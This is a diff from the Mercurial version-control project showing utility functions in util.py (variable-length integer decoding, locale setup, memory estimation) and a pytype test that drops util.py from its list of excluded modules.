3620 3623 bytes.append(pycompat.bytechr(bits))
3621 3624
3622 3625 return b''.join(bytes)
3623 3626
3624 3627
3625 3628 def uvarintdecodestream(fh):
3626 3629 """Decode an unsigned variable length integer from a stream.
3627 3630
3628 3631 The passed argument is anything that has a ``.read(N)`` method.
3629 3632
3630 3633 >>> try:
3631 3634 ... from StringIO import StringIO as BytesIO
3632 3635 ... except ImportError:
3633 3636 ... from io import BytesIO
3634 3637 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3635 3638 0
3636 3639 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3637 3640 1
3638 3641 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3639 3642 127
3640 3643 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3641 3644 1337
3642 3645 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3643 3646 65536
3644 3647 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3645 3648 Traceback (most recent call last):
3646 3649 ...
3647 3650 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3648 3651 """
3649 3652 result = 0
3650 3653 shift = 0
3651 3654 while True:
3652 3655 byte = ord(readexactly(fh, 1))
3653 3656 result |= (byte & 0x7F) << shift
3654 3657 if not (byte & 0x80):
3655 3658 return result
3656 3659 shift += 7
3657 3660
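A round-trip sketch tying the encoder and decoder together; io.BytesIO stands in for a real stream:

    from io import BytesIO

    for value in (0, 1, 127, 128, 1337, 65536):
        encoded = uvarintencode(value)
        # every encoded value decodes back to itself
        assert uvarintdecodestream(BytesIO(encoded)) == value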
3658 3661
3659 3662 # Passing the '' locale means that the locale should be set according to the
3660 3663 # user settings (environment variables).
3661 3664 # Python sometimes avoids setting the global locale settings. When interfacing
3662 3665 # with C code (e.g. the curses module or the Subversion bindings), the global
3663 3666 # locale settings must be initialized correctly. Python 2 does not initialize
3664 3667 # the global locale settings on interpreter startup. Python 3 sometimes
3665 3668 # initializes LC_CTYPE, but not consistently at least on Windows. Therefore we
3666 3669 # explicitly initialize it to get consistent behavior if it's not already
3667 3670 # initialized. Since CPython commit 177d921c8c03d30daa32994362023f777624b10d,
3668 3671 # LC_CTYPE is always initialized. If we require Python 3.8+, we should re-check
3669 3672 # if we can remove this code.
3670 3673 @contextlib.contextmanager
3671 3674 def with_lc_ctype():
3672 3675 oldloc = locale.setlocale(locale.LC_CTYPE, None)
3673 3676 if oldloc == 'C':
3674 3677 try:
3675 3678 try:
3676 3679 locale.setlocale(locale.LC_CTYPE, '')
3677 3680 except locale.Error:
3678 3681 # The likely case is that the locale from the environment
3679 3682 # variables is unknown.
3680 3683 pass
3681 3684 yield
3682 3685 finally:
3683 3686 locale.setlocale(locale.LC_CTYPE, oldloc)
3684 3687 else:
3685 3688 yield
3686 3689
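A sketch of the intended call pattern, wrapping an interface that consults the process-global locale (curses is one example the comment above names):

    from mercurial import util

    with util.with_lc_ctype():
        import curses  # C-level code that reads the global LC_CTYPE
        # ... use the locale-sensitive interface here ...
    # on exit, LC_CTYPE is restored to 'C' if that is what it was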
3687 3690
3688 3691 def _estimatememory():
3689 3692 # type: () -> Optional[int]
3690 3693 """Provide an estimate for the available system memory in Bytes.
3691 3694
3692 3695 If no estimate can be provided on the platform, returns None.
3693 3696 """
3694 3697 if pycompat.sysplatform.startswith(b'win'):
3695 3698 # On Windows, use the GlobalMemoryStatusEx kernel function directly.
3696 3699 from ctypes import c_long as DWORD, c_ulonglong as DWORDLONG
3697 3700 from ctypes.wintypes import ( # pytype: disable=import-error
3698 3701 Structure,
3699 3702 byref,
3700 3703 sizeof,
3701 3704 windll,
3702 3705 )
3703 3706
3704 3707 class MEMORYSTATUSEX(Structure):
3705 3708 _fields_ = [
3706 3709 ('dwLength', DWORD),
3707 3710 ('dwMemoryLoad', DWORD),
3708 3711 ('ullTotalPhys', DWORDLONG),
3709 3712 ('ullAvailPhys', DWORDLONG),
3710 3713 ('ullTotalPageFile', DWORDLONG),
3711 3714 ('ullAvailPageFile', DWORDLONG),
3712 3715 ('ullTotalVirtual', DWORDLONG),
3713 3716 ('ullAvailVirtual', DWORDLONG),
3714 3717 ('ullExtendedVirtual', DWORDLONG),
3715 3718 ]
3716 3719
3717 3720 x = MEMORYSTATUSEX()
3718 3721 x.dwLength = sizeof(x)
3719 3722 windll.kernel32.GlobalMemoryStatusEx(byref(x))
3720 3723 return x.ullAvailPhys
3721 3724
3722 3725 # On newer Unix-like systems and Mac OS X, the sysconf interface
3723 3726 # can be used. _SC_PAGE_SIZE is part of POSIX; _SC_PHYS_PAGES
3724 3727 # seems to be implemented on most systems.
3725 3728 try:
3726 3729 pagesize = os.sysconf(os.sysconf_names['SC_PAGE_SIZE'])
3727 3730 pages = os.sysconf(os.sysconf_names['SC_PHYS_PAGES'])
3728 3731 return pagesize * pages
3729 3732 except OSError: # sysconf can fail
3730 3733 pass
3731 3734 except KeyError: # unknown parameter
3732 3735 pass
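A sketch of how a caller might consult the estimate and degrade gracefully when the platform offers none; the 2 GiB threshold is arbitrary:

    mem = _estimatememory()
    if mem is not None and mem < 2 * 2 ** 30:
        pass  # e.g. prefer a slower but less memory-hungry strategy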
@@ -1,105 +1,104 b''
1 1 #require pytype py3 slow
2 2
3 3 $ cd $RUNTESTDIR/..
4 4
5 5 Many of the individual files that are excluded here confuse pytype
6 6 because they do a mix of Python 2 and Python 3 things
7 7 conditionally. There's no good way to help it out with that as far as
8 8 I can tell, so let's just hide those files from it for now. We should
9 9 endeavor to empty this list out over time, as some of these are
10 10 probably hiding real problems.
11 11
12 12 mercurial/bundlerepo.py # no vfs and ui attrs on bundlerepo
13 13 mercurial/changegroup.py # mysterious incorrect type detection
14 14 mercurial/chgserver.py # [attribute-error]
15 15 mercurial/cmdutil.py # No attribute 'markcopied' on mercurial.context.filectx [attribute-error]
16 16 mercurial/context.py # many [attribute-error]
17 17 mercurial/copies.py # No attribute 'items' on None [attribute-error]
18 18 mercurial/crecord.py # tons of [attribute-error], [module-attr]
19 19 mercurial/debugcommands.py # [wrong-arg-types]
20 20 mercurial/dispatch.py # initstdio: No attribute ... on TextIO [attribute-error]
21 21 mercurial/exchange.py # [attribute-error]
22 22 mercurial/hgweb/hgweb_mod.py # [attribute-error], [name-error], [wrong-arg-types]
23 23 mercurial/hgweb/server.py # [attribute-error], [name-error], [module-attr]
24 24 mercurial/hgweb/webcommands.py # [missing-parameter]
25 25 mercurial/hgweb/wsgicgi.py # confused values in os.environ
26 26 mercurial/httppeer.py # [attribute-error], [wrong-arg-types]
27 27 mercurial/interfaces # No attribute 'capabilities' on peer [attribute-error]
28 28 mercurial/keepalive.py # [attribute-error]
29 29 mercurial/localrepo.py # [attribute-error]
30 30 mercurial/lsprof.py # unguarded import
31 31 mercurial/manifest.py # [unsupported-operands], [wrong-arg-types]
32 32 mercurial/minirst.py # [unsupported-operands], [attribute-error]
33 33 mercurial/patch.py # [wrong-arg-types]
34 34 mercurial/pure/osutil.py # [invalid-typevar], [not-callable]
35 35 mercurial/pure/parsers.py # [attribute-error]
36 36 mercurial/pycompat.py # bytes vs str issues
37 37 mercurial/repoview.py # [attribute-error]
38 38 mercurial/sslutil.py # [attribute-error]
39 39 mercurial/statprof.py # bytes vs str on TextIO.write() [wrong-arg-types]
40 40 mercurial/testing/storage.py # tons of [attribute-error]
41 41 mercurial/ui.py # [attribute-error], [wrong-arg-types]
42 42 mercurial/unionrepo.py # ui, svfs, unfiltered [attribute-error]
43 43 mercurial/upgrade.py # line 84, in upgraderepo: No attribute 'discard' on Dict[nothing, nothing] [attribute-error]
44 44 mercurial/util.py # [attribute-error], [wrong-arg-count]
45 45 mercurial/utils/procutil.py # [attribute-error], [module-attr], [bad-return-type]
46 46 mercurial/utils/stringutil.py # [module-attr], [wrong-arg-count]
47 47 mercurial/utils/memorytop.py # not 3.6 compatible
48 48 mercurial/win32.py # [not-callable]
49 49 mercurial/wireprotoframing.py # [unsupported-operands], [attribute-error], [import-error]
50 50 mercurial/wireprotoserver.py # line 253, in _availableapis: No attribute '__iter__' on Callable[[Any, Any], Any] [attribute-error]
51 51 mercurial/wireprotov1peer.py # [attribute-error]
52 52 mercurial/wireprotov1server.py # BUG?: BundleValueError handler accesses subclass's attrs
53 53 mercurial/wireprotov2server.py # [unsupported-operands], [attribute-error]
54 54
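Modules usually graduate off the list above by annotating the few remaining false positives inline rather than excluding the whole file, which is how mercurial/util.py earned its removal from the command below. A hedged sketch of the pattern (the call is hypothetical; the comment syntax is pytype's):

    result = some_dynamically_typed_call()  # pytype: disable=attribute-error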
55 55 TODO: use --no-cache on test server? Caching the files locally helps during
56 56 development, but may be a hindrance for CI testing.
57 57
58 58 $ pytype -V 3.6 --keep-going --jobs auto mercurial \
59 59 > -x mercurial/bundlerepo.py \
60 60 > -x mercurial/changegroup.py \
61 61 > -x mercurial/chgserver.py \
62 62 > -x mercurial/cmdutil.py \
63 63 > -x mercurial/context.py \
64 64 > -x mercurial/copies.py \
65 65 > -x mercurial/crecord.py \
66 66 > -x mercurial/debugcommands.py \
67 67 > -x mercurial/dispatch.py \
68 68 > -x mercurial/exchange.py \
69 69 > -x mercurial/hgweb/hgweb_mod.py \
70 70 > -x mercurial/hgweb/server.py \
71 71 > -x mercurial/hgweb/webcommands.py \
72 72 > -x mercurial/hgweb/wsgicgi.py \
73 73 > -x mercurial/httppeer.py \
74 74 > -x mercurial/interfaces \
75 75 > -x mercurial/keepalive.py \
76 76 > -x mercurial/localrepo.py \
77 77 > -x mercurial/lsprof.py \
78 78 > -x mercurial/manifest.py \
79 79 > -x mercurial/minirst.py \
80 80 > -x mercurial/patch.py \
81 81 > -x mercurial/pure/osutil.py \
82 82 > -x mercurial/pure/parsers.py \
83 83 > -x mercurial/pycompat.py \
84 84 > -x mercurial/repoview.py \
85 85 > -x mercurial/sslutil.py \
86 86 > -x mercurial/statprof.py \
87 87 > -x mercurial/testing/storage.py \
88 88 > -x mercurial/thirdparty \
89 89 > -x mercurial/ui.py \
90 90 > -x mercurial/unionrepo.py \
91 91 > -x mercurial/upgrade.py \
92 > -x mercurial/util.py \
93 92 > -x mercurial/utils/procutil.py \
94 93 > -x mercurial/utils/stringutil.py \
95 94 > -x mercurial/utils/memorytop.py \
96 95 > -x mercurial/win32.py \
97 96 > -x mercurial/wireprotoframing.py \
98 97 > -x mercurial/wireprotoserver.py \
99 98 > -x mercurial/wireprotov1peer.py \
100 99 > -x mercurial/wireprotov1server.py \
101 100 > -x mercurial/wireprotov2server.py \
102 101 > > $TESTTMP/pytype-output.txt || cat $TESTTMP/pytype-output.txt
103 102
104 103 Only show the results on a failure, because the output on success is also
105 104 voluminous and variable.